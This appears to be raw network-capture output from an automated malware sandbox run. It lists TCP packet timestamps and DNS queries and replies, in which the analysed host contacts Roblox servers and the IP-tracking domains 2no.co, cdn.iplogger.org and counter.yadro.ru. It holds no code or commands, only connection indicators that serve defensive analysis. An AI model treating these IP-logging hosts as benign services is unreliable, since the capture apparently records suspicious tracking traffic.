                                                                                                Jul 30, 2024 00:46:20.952313900 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:20.952330112 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.993252993 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.993350983 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.993380070 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.993396997 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:20.993403912 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.993416071 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.993455887 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:20.994107962 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.994200945 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:20.994208097 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.995321035 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.995363951 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:20.995373964 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.997427940 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.997518063 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:20.997523069 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.000611067 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:21.000682116 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.000819921 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:21.022978067 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.023034096 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.023123026 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.025522947 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.025537014 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.145535946 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.145908117 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.145919085 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.147010088 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.147068024 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.148727894 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.148789883 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.149135113 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.149147034 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.198301077 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.377924919 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.378009081 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.378171921 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.379188061 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.379205942 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.380840063 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.380873919 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.380983114 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.381262064 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.381277084 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.514955997 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.515244007 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.515271902 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.516279936 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.516366959 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.518590927 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.518676996 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.519418955 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.519429922 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.564368010 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.660559893 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.660630941 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.661678076 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.662023067 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.662048101 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.662960052 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.663005114 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.663132906 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.663527966 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.663542032 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.893369913 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.895606995 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:21.895632029 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.896652937 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.896719933 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:21.897912979 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:21.898025990 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.005923033 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.005971909 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.006036043 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.050369978 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.050411940 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.106353998 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.113200903 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.113219023 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.113604069 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.119096041 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.119194031 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.119595051 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.164508104 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.275305033 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:22.275361061 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.275576115 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:22.278165102 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:22.278177977 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.362031937 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.362360001 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.362380028 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.362729073 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.363085032 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.363153934 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.363269091 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.404411077 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.404424906 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.521498919 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.521589041 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.521636009 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.524509907 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.524535894 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.580459118 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.580552101 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.580790043 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.596606970 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.596632004 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.617496014 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:22.617539883 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.617625952 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:22.617903948 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:22.617918015 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.641784906 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:22.641820908 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.641978979 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:22.642679930 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:22.642699003 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.780766010 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.782051086 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.782080889 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.783622026 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.783679962 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.784953117 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.785046101 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.825072050 CEST49698443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.826006889 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.826052904 CEST44349732104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.826292038 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.833170891 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.833201885 CEST44349732104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.841299057 CEST44349698104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.998465061 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.998555899 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.020932913 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.020953894 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.021908998 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.070324898 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.096664906 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.096975088 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.097002029 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.098009109 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.098083973 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.098376989 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.098434925 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.098524094 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.098531008 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.149323940 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.231400967 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231467962 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231517076 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231534004 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.231563091 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231583118 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231641054 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.232446909 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.232465982 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.232475042 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.232532024 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.257704020 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.257751942 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.258158922 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:52.219273090 CEST6108453192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:46:52.237746954 CEST53610841.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:56.112193108 CEST53534961.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:47:08.694204092 CEST138138192.168.2.7192.168.2.255
                                                                                                Jul 30, 2024 00:47:11.204278946 CEST6124553192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:47:11.222673893 CEST53612451.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:47:18.820261955 CEST53619021.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:47:18.987771034 CEST53640451.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:47:31.904818058 CEST5928253192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:47:32.128716946 CEST53592821.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:47:47.739026070 CEST53528261.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:48:02.844325066 CEST4934953192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:48:02.861970901 CEST53493491.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 30, 2024 00:46:06.825505018 CEST | 192.168.2.7 | 1.1.1.1 | 0xb4c1 | Standard query (0) | ecsv2.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:07.899291039 CEST | 192.168.2.7 | 1.1.1.1 | 0x3244 | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:19.029504061 CEST | 192.168.2.7 | 1.1.1.1 | 0x3895 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:19.029632092 CEST | 192.168.2.7 | 1.1.1.1 | 0x32b9 | Standard query (0) | 2no.co | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:20.135720015 CEST | 192.168.2.7 | 1.1.1.1 | 0x4c85 | Standard query (0) | cdn.iplogger.org | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.135864973 CEST | 192.168.2.7 | 1.1.1.1 | 0x290c | Standard query (0) | cdn.iplogger.org | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:20.136509895 CEST | 192.168.2.7 | 1.1.1.1 | 0xf2e | Standard query (0) | counter.yadro.ru | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.136599064 CEST | 192.168.2.7 | 1.1.1.1 | 0xc2d9 | Standard query (0) | counter.yadro.ru | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:21.002269030 CEST | 192.168.2.7 | 1.1.1.1 | 0x3dfa | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:21.002727985 CEST | 192.168.2.7 | 1.1.1.1 | 0x20ce | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:22.623306036 CEST | 192.168.2.7 | 1.1.1.1 | 0xd649 | Standard query (0) | counter.yadro.ru | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:22.623419046 CEST | 192.168.2.7 | 1.1.1.1 | 0xd9e6 | Standard query (0) | counter.yadro.ru | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:23.236690998 CEST | 192.168.2.7 | 1.1.1.1 | 0x588b | Standard query (0) | cdn.iplogger.org | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:23.236890078 CEST | 192.168.2.7 | 1.1.1.1 | 0x19f5 | Standard query (0) | cdn.iplogger.org | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:23.405500889 CEST | 192.168.2.7 | 1.1.1.1 | 0x20dd | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:23.405669928 CEST | 192.168.2.7 | 1.1.1.1 | 0x794d | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:25.010940075 CEST | 192.168.2.7 | 1.1.1.1 | 0x46a7 | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:38.813288927 CEST | 192.168.2.7 | 1.1.1.1 | 0xac89 | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:52.219273090 CEST | 192.168.2.7 | 1.1.1.1 | 0xc8d2 | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:47:11.204278946 CEST | 192.168.2.7 | 1.1.1.1 | 0x299f | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:47:31.904818058 CEST | 192.168.2.7 | 1.1.1.1 | 0xc5af | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:48:02.844325066 CEST | 192.168.2.7 | 1.1.1.1 | 0x8db6 | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 30, 2024 00:46:06.844732046 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4c1 | No error (0) | ecsv2.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:06.844732046 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4c1 | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:06.844732046 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4c1 | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:06.844732046 CEST | 1.1.1.1 | 192.168.2.7 | 0xb4c1 | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.3 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:07.917977095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3244 | No error (0) | clientsettingscdn.roblox.com | d2v57ias1m20gl.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:07.917977095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3244 | No error (0) | d2v57ias1m20gl.cloudfront.net |  | 18.239.18.53 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:07.917977095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3244 | No error (0) | d2v57ias1m20gl.cloudfront.net |  | 18.239.18.127 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:07.917977095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3244 | No error (0) | d2v57ias1m20gl.cloudfront.net |  | 18.239.18.85 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:07.917977095 CEST | 1.1.1.1 | 192.168.2.7 | 0x3244 | No error (0) | d2v57ias1m20gl.cloudfront.net |  | 18.239.18.114 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:19.049940109 CEST | 1.1.1.1 | 192.168.2.7 | 0x3895 | No error (0) | 2no.co |  | 172.67.149.76 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:19.049940109 CEST | 1.1.1.1 | 192.168.2.7 | 0x3895 | No error (0) | 2no.co |  | 104.21.79.229 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:19.051006079 CEST | 1.1.1.1 | 192.168.2.7 | 0x32b9 | No error (0) | 2no.co |  |  | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:20.154234886 CEST | 1.1.1.1 | 192.168.2.7 | 0xf2e | No error (0) | counter.yadro.ru |  | 88.212.201.198 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.154234886 CEST | 1.1.1.1 | 192.168.2.7 | 0xf2e | No error (0) | counter.yadro.ru |  | 88.212.202.52 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.154234886 CEST | 1.1.1.1 | 192.168.2.7 | 0xf2e | No error (0) | counter.yadro.ru |  | 88.212.201.204 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.155325890 CEST | 1.1.1.1 | 192.168.2.7 | 0x4c85 | No error (0) | cdn.iplogger.org |  | 172.67.132.113 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.155325890 CEST | 1.1.1.1 | 192.168.2.7 | 0x4c85 | No error (0) | cdn.iplogger.org |  | 104.21.4.208 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:20.156322956 CEST | 1.1.1.1 | 192.168.2.7 | 0x290c | No error (0) | cdn.iplogger.org |  |  | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:21.020292044 CEST | 1.1.1.1 | 192.168.2.7 | 0x3dfa | No error (0) | a.nel.cloudflare.com |  | 35.190.80.1 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:22.640727043 CEST | 1.1.1.1 | 192.168.2.7 | 0xd649 | No error (0) | counter.yadro.ru |  | 88.212.201.204 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:22.640727043 CEST | 1.1.1.1 | 192.168.2.7 | 0xd649 | No error (0) | counter.yadro.ru |  | 88.212.202.52 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:22.640727043 CEST | 1.1.1.1 | 192.168.2.7 | 0xd649 | No error (0) | counter.yadro.ru |  | 88.212.201.198 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:23.256771088 CEST | 1.1.1.1 | 192.168.2.7 | 0x588b | No error (0) | cdn.iplogger.org |  | 172.67.132.113 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:23.256771088 CEST | 1.1.1.1 | 192.168.2.7 | 0x588b | No error (0) | cdn.iplogger.org |  | 104.21.4.208 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:23.256983995 CEST | 1.1.1.1 | 192.168.2.7 | 0x19f5 | No error (0) | cdn.iplogger.org |  |  | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:23.422918081 CEST | 1.1.1.1 | 192.168.2.7 | 0x20dd | No error (0) | www.google.com |  | 172.217.18.4 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:23.422998905 CEST | 1.1.1.1 | 192.168.2.7 | 0x794d | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Jul 30, 2024 00:46:25.300046921 CEST | 1.1.1.1 | 192.168.2.7 | 0x46a7 | No error (0) | client-telemetry.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:25.300046921 CEST | 1.1.1.1 | 192.168.2.7 | 0x46a7 | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:25.300046921 CEST | 1.1.1.1 | 192.168.2.7 | 0x46a7 | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:25.300046921 CEST | 1.1.1.1 | 192.168.2.7 | 0x46a7 | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.3 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:38.831028938 CEST | 1.1.1.1 | 192.168.2.7 | 0xac89 | No error (0) | client-telemetry.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:38.831028938 CEST | 1.1.1.1 | 192.168.2.7 | 0xac89 | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:38.831028938 CEST | 1.1.1.1 | 192.168.2.7 | 0xac89 | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:38.831028938 CEST | 1.1.1.1 | 192.168.2.7 | 0xac89 | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.4 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:46:52.237746954 CEST | 1.1.1.1 | 192.168.2.7 | 0xc8d2 | No error (0) | client-telemetry.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:52.237746954 CEST | 1.1.1.1 | 192.168.2.7 | 0xc8d2 | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:52.237746954 CEST | 1.1.1.1 | 192.168.2.7 | 0xc8d2 | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:46:52.237746954 CEST | 1.1.1.1 | 192.168.2.7 | 0xc8d2 | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.4 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:47:11.222673893 CEST | 1.1.1.1 | 192.168.2.7 | 0x299f | No error (0) | client-telemetry.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:47:11.222673893 CEST | 1.1.1.1 | 192.168.2.7 | 0x299f | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:47:11.222673893 CEST | 1.1.1.1 | 192.168.2.7 | 0x299f | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:47:11.222673893 CEST | 1.1.1.1 | 192.168.2.7 | 0x299f | No error (0) | edge-term4-ams2.roblox.com |  | 128.116.21.4 | A (IP address) | IN (0x0001) | false
Jul 30, 2024 00:47:32.128716946 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5af | No error (0) | client-telemetry.roblox.com | titanium.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:47:32.128716946 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5af | No error (0) | titanium.roblox.com | edge-term4.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 30, 2024 00:47:32.128716946 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5af | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com |  | CNAME (Canonical name) | IN (0x0001) | false
